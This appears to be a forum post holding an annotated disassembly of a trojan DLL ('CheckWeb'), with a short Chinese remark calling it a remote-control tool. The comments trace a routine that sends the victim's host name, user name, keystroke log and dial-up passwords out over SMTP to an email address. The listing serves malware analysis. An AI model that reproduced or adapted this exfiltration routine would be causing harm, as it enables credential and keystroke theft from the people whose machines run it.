10001909 |. 8DBC24 7C0100>LEA EDI,DWORD PTR SS:[ESP+17C]
10001910 |. 83C9 FF OR ECX,FFFFFFFF
10001913 |. 33C0 XOR EAX,EAX
10001915 |. 83C4 0C ADD ESP,0C
10001918 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
1000191A |. F7D1 NOT ECX
1000191C |. 49 DEC ECX
1000191D |. 6A 00 PUSH 0 ; /Flags = 0
1000191F |. 51 PUSH ECX ; |DataSize
10001920 |. 8D8C24 780100>LEA ECX,DWORD PTR SS:[ESP+178] ; |
10001927 |. 51 PUSH ECX ; |Data
10001928 |. 53 PUSH EBX ; |Socket
10001929 |. E8 660A0000 CALL <JMP.&WSOCK32.#19> ; \send
1000192E |. 85C0 TEST EAX,EAX
10001930 |. 0F8E AD030000 JLE CheckWeb.10001CE3
10001936 |. 6A 00 PUSH 0 ; /Flags = 0
10001938 |. 6A 02 PUSH 2 ; |DataSize = 2
1000193A |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
1000193F |. 53 PUSH EBX ; |Socket
10001940 |. E8 4F0A0000 CALL <JMP.&WSOCK32.#19> ; \send
10001945 |. 85C0 TEST EAX,EAX
10001947 |. 0F8E 96030000 JLE CheckWeb.10001CE3
1000194D |. 6A 00 PUSH 0 ; /Flags = 0
1000194F |. 8D9424 D80100>LEA EDX,DWORD PTR SS:[ESP+1D8] ; |
10001956 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000195B |. 52 PUSH EDX ; |Buffer
1000195C |. 53 PUSH EBX ; |Socket
1000195D |. E8 380A0000 CALL <JMP.&WSOCK32.#16> ; \recv
10001962 |. 85C0 TEST EAX,EAX
10001964 |. 0F8E 79030000 JLE CheckWeb.10001CE3
1000196A |. 8D8424 D40100>LEA EAX,DWORD PTR SS:[ESP+1D4]
10001971 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
10001976 |. 50 PUSH EAX
10001977 |. E8 740C0000 CALL CheckWeb.100025F0
1000197C |. 83C4 08 ADD ESP,8
1000197F |. 85C0 TEST EAX,EAX
10001981 |. 0F84 5C030000 JE CheckWeb.10001CE3
; Send the 6-byte string at 100090D4 (presumably "DATA" plus CRLF); the reply must contain "354".
10001987 |. 6A 00 PUSH 0 ; /Flags = 0
10001989 |. 6A 06 PUSH 6 ; |DataSize = 6
1000198B |. 68 D4900010 PUSH CheckWeb.100090D4 ; |Data = CheckWeb.100090D4
10001990 |. 53 PUSH EBX ; |Socket
10001991 |. E8 FE090000 CALL <JMP.&WSOCK32.#19> ; \send
10001996 |. 85C0 TEST EAX,EAX
10001998 |. 0F8E 45030000 JLE CheckWeb.10001CE3
1000199E |. 6A 00 PUSH 0 ; /Flags = 0
100019A0 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
100019A7 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
100019AC |. 51 PUSH ECX ; |Buffer
100019AD |. 53 PUSH EBX ; |Socket
100019AE |. E8 E7090000 CALL <JMP.&WSOCK32.#16> ; \recv
100019B3 |. 85C0 TEST EAX,EAX
100019B5 |. 0F8E 28030000 JLE CheckWeb.10001CE3
100019BB |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
100019C2 |. 68 D0900010 PUSH CheckWeb.100090D0 ; ASCII "354"
100019C7 |. 52 PUSH EDX
100019C8 |. E8 230C0000 CALL CheckWeb.100025F0
100019CD |. 83C4 08 ADD ESP,8
100019D0 |. 85C0 TEST EAX,EAX
100019D2 |. 0F84 0B030000 JE CheckWeb.10001CE3
; Message header: "From: " followed by the sender address in 100172A0 and CRLF.
100019D8 |. BF C8900010 MOV EDI,CheckWeb.100090C8 ; ASCII "From: "
100019DD |. 83C9 FF OR ECX,FFFFFFFF
100019E0 |. 33C0 XOR EAX,EAX
100019E2 |. 6A 00 PUSH 0 ; /Flags = 0
100019E4 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
100019E6 |. F7D1 NOT ECX ; |
100019E8 |. 49 DEC ECX ; |
100019E9 |. 51 PUSH ECX ; |DataSize
100019EA |. 68 C8900010 PUSH CheckWeb.100090C8 ; |Data = CheckWeb.100090C8
100019EF |. 53 PUSH EBX ; |Socket
100019F0 |. E8 9F090000 CALL <JMP.&WSOCK32.#19> ; \send
100019F5 |. 85C0 TEST EAX,EAX
100019F7 |. 0F8E E6020000 JLE CheckWeb.10001CE3
100019FD |. BF A0720110 MOV EDI,CheckWeb.100172A0
10001A02 |. 83C9 FF OR ECX,FFFFFFFF
10001A05 |. 33C0 XOR EAX,EAX
10001A07 |. 6A 00 PUSH 0 ; /Flags = 0
10001A09 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001A0B |. F7D1 NOT ECX ; |
10001A0D |. 49 DEC ECX ; |
10001A0E |. 51 PUSH ECX ; |DataSize
10001A0F |. 68 A0720110 PUSH CheckWeb.100172A0 ; |Data = CheckWeb.100172A0
10001A14 |. 53 PUSH EBX ; |Socket
10001A15 |. E8 7A090000 CALL <JMP.&WSOCK32.#19> ; \send
10001A1A |. 85C0 TEST EAX,EAX
10001A1C |. 0F8E C1020000 JLE CheckWeb.10001CE3
10001A22 |. 6A 00 PUSH 0 ; /Flags = 0
10001A24 |. 6A 02 PUSH 2 ; |DataSize = 2
10001A26 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001A2B |. 53 PUSH EBX ; |Socket
10001A2C |. E8 63090000 CALL <JMP.&WSOCK32.#19> ; \send
10001A31 |. 85C0 TEST EAX,EAX
10001A33 |. 0F8E AA020000 JLE CheckWeb.10001CE3
; Subject line: the "Subject: %s" format is filled with the local host name from [ESP+20].
; The format string itself ends with a line break, and one more CRLF is sent after it.
10001A39 |. B9 19000000 MOV ECX,19
10001A3E |. 33C0 XOR EAX,EAX
10001A40 |. 8DBC24 0C0100>LEA EDI,DWORD PTR SS:[ESP+10C]
10001A47 |. F3:AB REP STOS DWORD PTR ES:[EDI]
10001A49 |. 8D4424 20 LEA EAX,DWORD PTR SS:[ESP+20]
10001A4D |. 8D8C24 0C0100>LEA ECX,DWORD PTR SS:[ESP+10C]
10001A54 |. 50 PUSH EAX
10001A55 |. 68 B8900010 PUSH CheckWeb.100090B8 ; ASCII "Subject: %s
"
10001A5A |. 51 PUSH ECX
10001A5B |. E8 380B0000 CALL CheckWeb.10002598
10001A60 |. 8DBC24 180100>LEA EDI,DWORD PTR SS:[ESP+118]
10001A67 |. 83C9 FF OR ECX,FFFFFFFF
10001A6A |. 33C0 XOR EAX,EAX
10001A6C |. 83C4 0C ADD ESP,0C
10001A6F |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001A71 |. F7D1 NOT ECX
10001A73 |. 49 DEC ECX
10001A74 |. 6A 00 PUSH 0 ; /Flags = 0
10001A76 |. 8D9424 100100>LEA EDX,DWORD PTR SS:[ESP+110] ; |
10001A7D |. 51 PUSH ECX ; |DataSize
10001A7E |. 52 PUSH EDX ; |Data
10001A7F |. 53 PUSH EBX ; |Socket
10001A80 |. E8 0F090000 CALL <JMP.&WSOCK32.#19> ; \send
10001A85 |. 85C0 TEST EAX,EAX
10001A87 |. 0F8E 56020000 JLE CheckWeb.10001CE3
10001A8D |. 6A 00 PUSH 0 ; /Flags = 0
10001A8F |. 6A 02 PUSH 2 ; |DataSize = 2
10001A91 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001A96 |. 53 PUSH EBX ; |Socket
10001A97 |. E8 F8080000 CALL <JMP.&WSOCK32.#19> ; \send
10001A9C |. 85C0 TEST EAX,EAX
10001A9E |. 0F8E 3F020000 JLE CheckWeb.10001CE3
; Body, first line: the user name from [ESP+64], the 1-byte separator at 100090B4, the
; host name from [ESP+20], then CRLF.
10001AA4 |. 8D7C24 64 LEA EDI,DWORD PTR SS:[ESP+64]
10001AA8 |. 83C9 FF OR ECX,FFFFFFFF
10001AAB |. 33C0 XOR EAX,EAX
10001AAD |. 6A 00 PUSH 0 ; /Flags = 0
10001AAF |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001AB1 |. F7D1 NOT ECX ; |
10001AB3 |. 49 DEC ECX ; |
10001AB4 |. 8D4424 68 LEA EAX,DWORD PTR SS:[ESP+68] ; |
10001AB8 |. 51 PUSH ECX ; |DataSize
10001AB9 |. 50 PUSH EAX ; |Data
10001ABA |. 53 PUSH EBX ; |Socket
10001ABB |. E8 D4080000 CALL <JMP.&WSOCK32.#19> ; \send
10001AC0 |. 85C0 TEST EAX,EAX
10001AC2 |. 0F8E 1B020000 JLE CheckWeb.10001CE3
10001AC8 |. 6A 00 PUSH 0 ; /Flags = 0
10001ACA |. 6A 01 PUSH 1 ; |DataSize = 1
10001ACC |. 68 B4900010 PUSH CheckWeb.100090B4 ; |Data = CheckWeb.100090B4
10001AD1 |. 53 PUSH EBX ; |Socket
10001AD2 |. E8 BD080000 CALL <JMP.&WSOCK32.#19> ; \send
10001AD7 |. 85C0 TEST EAX,EAX
10001AD9 |. 0F8E 04020000 JLE CheckWeb.10001CE3
10001ADF |. 8D7C24 20 LEA EDI,DWORD PTR SS:[ESP+20]
10001AE3 |. 83C9 FF OR ECX,FFFFFFFF
10001AE6 |. 33C0 XOR EAX,EAX
10001AE8 |. 6A 00 PUSH 0 ; /Flags = 0
10001AEA |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001AEC |. F7D1 NOT ECX ; |
10001AEE |. 49 DEC ECX ; |
10001AEF |. 51 PUSH ECX ; |DataSize
10001AF0 |. 8D4C24 28 LEA ECX,DWORD PTR SS:[ESP+28] ; |
10001AF4 |. 51 PUSH ECX ; |Data
10001AF5 |. 53 PUSH EBX ; |Socket
10001AF6 |. E8 99080000 CALL <JMP.&WSOCK32.#19> ; \send
10001AFB |. 85C0 TEST EAX,EAX
10001AFD |. 0F8E E0010000 JLE CheckWeb.10001CE3
10001B03 |. 6A 00 PUSH 0 ; /Flags = 0
10001B05 |. 6A 02 PUSH 2 ; |DataSize = 2
10001B07 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001B0C |. 53 PUSH EBX ; |Socket
10001B0D |. E8 82080000 CALL <JMP.&WSOCK32.#19> ; \send
10001B12 |. 85C0 TEST EAX,EAX
10001B14 |. 0F8E C9010000 JLE CheckWeb.10001CE3
; Body, next line: the global buffer 1000AE18 (passed to 10001D00 at 1000151F), then CRLF.
10001B1A |. BF 18AE0010 MOV EDI,CheckWeb.1000AE18
10001B1F |. 83C9 FF OR ECX,FFFFFFFF
10001B22 |. 33C0 XOR EAX,EAX
10001B24 |. 6A 00 PUSH 0 ; /Flags = 0
10001B26 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001B28 |. F7D1 NOT ECX ; |
10001B2A |. 49 DEC ECX ; |
10001B2B |. 51 PUSH ECX ; |DataSize
10001B2C |. 68 18AE0010 PUSH CheckWeb.1000AE18 ; |Data = CheckWeb.1000AE18
10001B31 |. 53 PUSH EBX ; |Socket
10001B32 |. E8 5D080000 CALL <JMP.&WSOCK32.#19> ; \send
10001B37 |. 85C0 TEST EAX,EAX
10001B39 |. 0F8E A4010000 JLE CheckWeb.10001CE3
10001B3F |. 6A 00 PUSH 0 ; /Flags = 0
10001B41 |. 6A 02 PUSH 2 ; |DataSize = 2
10001B43 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001B48 |. 53 PUSH EBX ; |Socket
10001B49 |. E8 46080000 CALL <JMP.&WSOCK32.#19> ; \send
10001B4E |. 85C0 TEST EAX,EAX
10001B50 |. 0F8E 8D010000 JLE CheckWeb.10001CE3
; 100021B0 is not shown; judging by the fallback string it presumably puts the captured
; keystroke log into 1000AE80. If that buffer holds fewer than 2 characters, the literal
; "not key log!!!" (with its NUL) is copied over it by the inline strcpy below.
10001B56 |. E8 55060000 CALL CheckWeb.100021B0
10001B5B |. BF 80AE0010 MOV EDI,CheckWeb.1000AE80
10001B60 |. 83C9 FF OR ECX,FFFFFFFF
10001B63 |. 33C0 XOR EAX,EAX
10001B65 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001B67 |. F7D1 NOT ECX
10001B69 |. 49 DEC ECX
10001B6A |. 83F9 02 CMP ECX,2
10001B6D |. 73 23 JNB SHORT CheckWeb.10001B92
10001B6F |. BF A4900010 MOV EDI,CheckWeb.100090A4 ; ASCII "not key log!!!"
10001B74 |. 83C9 FF OR ECX,FFFFFFFF
10001B77 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001B79 |. F7D1 NOT ECX
10001B7B |. 2BF9 SUB EDI,ECX
10001B7D |. 8BD1 MOV EDX,ECX
10001B7F |. 8BF7 MOV ESI,EDI
10001B81 |. BF 80AE0010 MOV EDI,CheckWeb.1000AE80
10001B86 |. C1E9 02 SHR ECX,2
10001B89 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
10001B8B |. 8BCA MOV ECX,EDX
10001B8D |. 83E1 03 AND ECX,3
10001B90 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
; Body, next line: the contents of 1000AE80, then CRLF.
10001B92 |> BF 80AE0010 MOV EDI,CheckWeb.1000AE80
10001B97 |. 83C9 FF OR ECX,FFFFFFFF
10001B9A |. 33C0 XOR EAX,EAX
10001B9C |. 6A 00 PUSH 0 ; /Flags = 0
10001B9E |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001BA0 |. F7D1 NOT ECX ; |
10001BA2 |. 49 DEC ECX ; |
10001BA3 |. 51 PUSH ECX ; |DataSize
10001BA4 |. 68 80AE0010 PUSH CheckWeb.1000AE80 ; |Data = CheckWeb.1000AE80
10001BA9 |. 53 PUSH EBX ; |Socket
10001BAA |. E8 E5070000 CALL <JMP.&WSOCK32.#19> ; \send
10001BAF |. 85C0 TEST EAX,EAX
10001BB1 |. 0F8E 2C010000 JLE CheckWeb.10001CE3
10001BB7 |. 6A 00 PUSH 0 ; /Flags = 0
10001BB9 |. 6A 02 PUSH 2 ; |DataSize = 2
10001BBB |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001BC0 |. 53 PUSH EBX ; |Socket
10001BC1 |. E8 CE070000 CALL <JMP.&WSOCK32.#19> ; \send
10001BC6 |. 85C0 TEST EAX,EAX
10001BC8 |. 0F8E 15010000 JLE CheckWeb.10001CE3
; 10001000 is not shown; judging by the fallback string it presumably puts recovered
; dial-up credentials into 10009E18. Same pattern as above: fewer than 2 characters means
; the literal "not x dial pass!!!" is copied in instead.
10001BCE |. E8 2DF4FFFF CALL CheckWeb.10001000
10001BD3 |. BF 189E0010 MOV EDI,CheckWeb.10009E18
10001BD8 |. 83C9 FF OR ECX,FFFFFFFF
10001BDB |. 33C0 XOR EAX,EAX
10001BDD |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001BDF |. F7D1 NOT ECX
10001BE1 |. 49 DEC ECX
10001BE2 |. 83F9 02 CMP ECX,2
10001BE5 |. 73 23 JNB SHORT CheckWeb.10001C0A
10001BE7 |. BF 90900010 MOV EDI,CheckWeb.10009090 ; ASCII "not x dial pass!!!"
10001BEC |. 83C9 FF OR ECX,FFFFFFFF
10001BEF |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001BF1 |. F7D1 NOT ECX
10001BF3 |. 2BF9 SUB EDI,ECX
10001BF5 |. 8BC1 MOV EAX,ECX
10001BF7 |. 8BF7 MOV ESI,EDI
10001BF9 |. BF 189E0010 MOV EDI,CheckWeb.10009E18
10001BFE |. C1E9 02 SHR ECX,2
10001C01 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
10001C03 |. 8BC8 MOV ECX,EAX
10001C05 |. 83E1 03 AND ECX,3
10001C08 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
; Body, next line: the contents of 10009E18, then CRLF.
10001C0A |> BF 189E0010 MOV EDI,CheckWeb.10009E18
10001C0F |. 83C9 FF OR ECX,FFFFFFFF
10001C12 |. 33C0 XOR EAX,EAX
10001C14 |. 6A 00 PUSH 0 ; /Flags = 0
10001C16 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001C18 |. F7D1 NOT ECX ; |
10001C1A |. 49 DEC ECX ; |
10001C1B |. 51 PUSH ECX ; |DataSize
10001C1C |. 68 189E0010 PUSH CheckWeb.10009E18 ; |Data = CheckWeb.10009E18
10001C21 |. 53 PUSH EBX ; |Socket
10001C22 |. E8 6D070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C27 |. 85C0 TEST EAX,EAX
10001C29 |. 0F8E B4000000 JLE CheckWeb.10001CE3
10001C2F |. 6A 00 PUSH 0 ; /Flags = 0
10001C31 |. 6A 02 PUSH 2 ; |DataSize = 2
10001C33 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001C38 |. 53 PUSH EBX ; |Socket
10001C39 |. E8 56070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C3E |. 85C0 TEST EAX,EAX
10001C40 |. 0F8E 9D000000 JLE CheckWeb.10001CE3
; Close the message: a 4-byte string (10009088) and a 5-byte string (10009080) are sent;
; the second is presumably the CRLF "." CRLF end-of-data marker. The reply must contain "250".
10001C46 |. 6A 00 PUSH 0 ; /Flags = 0
10001C48 |. 6A 04 PUSH 4 ; |DataSize = 4
10001C4A |. 68 88900010 PUSH CheckWeb.10009088 ; |Data = CheckWeb.10009088
10001C4F |. 53 PUSH EBX ; |Socket
10001C50 |. E8 3F070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C55 |. 85C0 TEST EAX,EAX
10001C57 |. 0F8E 86000000 JLE CheckWeb.10001CE3
10001C5D |. 6A 00 PUSH 0 ; /Flags = 0
10001C5F |. 6A 05 PUSH 5 ; |DataSize = 5
10001C61 |. 68 80900010 PUSH CheckWeb.10009080 ; |Data = CheckWeb.10009080
10001C66 |. 53 PUSH EBX ; |Socket
10001C67 |. E8 28070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C6C |. 85C0 TEST EAX,EAX
10001C6E |. 7E 73 JLE SHORT CheckWeb.10001CE3
10001C70 |. 6A 00 PUSH 0 ; /Flags = 0
10001C72 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
10001C79 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
10001C7E |. 51 PUSH ECX ; |Buffer
10001C7F |. 53 PUSH EBX ; |Socket
10001C80 |. E8 15070000 CALL <JMP.&WSOCK32.#16> ; \recv
10001C85 |. 85C0 TEST EAX,EAX
10001C87 |. 7E 5A JLE SHORT CheckWeb.10001CE3
10001C89 |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
10001C90 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
10001C95 |. 52 PUSH EDX
10001C96 |. E8 55090000 CALL CheckWeb.100025F0
10001C9B |. 83C4 08 ADD ESP,8
10001C9E |. 85C0 TEST EAX,EAX
10001CA0 |. 74 41 JE SHORT CheckWeb.10001CE3
; Send the 6-byte string at 10009078 (presumably "QUIT" plus CRLF) and look for "221";
; the result of that last check is not used, control falls through to the cleanup.
10001CA2 |. 6A 00 PUSH 0 ; /Flags = 0
10001CA4 |. 6A 06 PUSH 6 ; |DataSize = 6
10001CA6 |. 68 78900010 PUSH CheckWeb.10009078 ; |Data = CheckWeb.10009078
10001CAB |. 53 PUSH EBX ; |Socket
10001CAC |. E8 E3060000 CALL <JMP.&WSOCK32.#19> ; \send
10001CB1 |. 85C0 TEST EAX,EAX
10001CB3 |. 7E 2E JLE SHORT CheckWeb.10001CE3
10001CB5 |. 6A 00 PUSH 0 ; /Flags = 0
10001CB7 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
10001CBE |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
10001CC3 |. 50 PUSH EAX ; |Buffer
10001CC4 |. 53 PUSH EBX ; |Socket
10001CC5 |. E8 D0060000 CALL <JMP.&WSOCK32.#16> ; \recv
10001CCA |. 85C0 TEST EAX,EAX
10001CCC |. 7E 15 JLE SHORT CheckWeb.10001CE3
10001CCE |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
10001CD5 |. 68 74900010 PUSH CheckWeb.10009074 ; ASCII "221"
10001CDA |. 51 PUSH ECX
10001CDB |. E8 10090000 CALL CheckWeb.100025F0
10001CE0 |. 83C4 08 ADD ESP,8
; Common exit: close the socket, release Winsock, restore registers, return 0.
10001CE3 |> 53 PUSH EBX ; /Socket
10001CE4 |. E8 A5060000 CALL <JMP.&WSOCK32.#3> ; \closesocket
10001CE9 |. E8 9A060000 CALL <JMP.&WSOCK32.#116> ; [WSACleanup
10001CEE |. 5F POP EDI
10001CEF |. 5E POP ESI
10001CF0 |. 33C0 XOR EAX,EAX
10001CF2 |. 5B POP EBX
10001CF3 |. 81C4 5C070000 ADD ESP,75C
10001CF9 \. C3 RETN
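还有一些也懒得写了，大概就是个远控之类的东西。就上面贴出的 100014E0 来看，能确认的是它通过 SMTP（25 端口）把主机名、用户名和另外几段缓冲区内容发到邮箱；从 "not key log!!!" 和 "not x dial pass!!!" 这两个字符串看，发送的应该是键盘记录和拨号密码。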
我把程序传附件里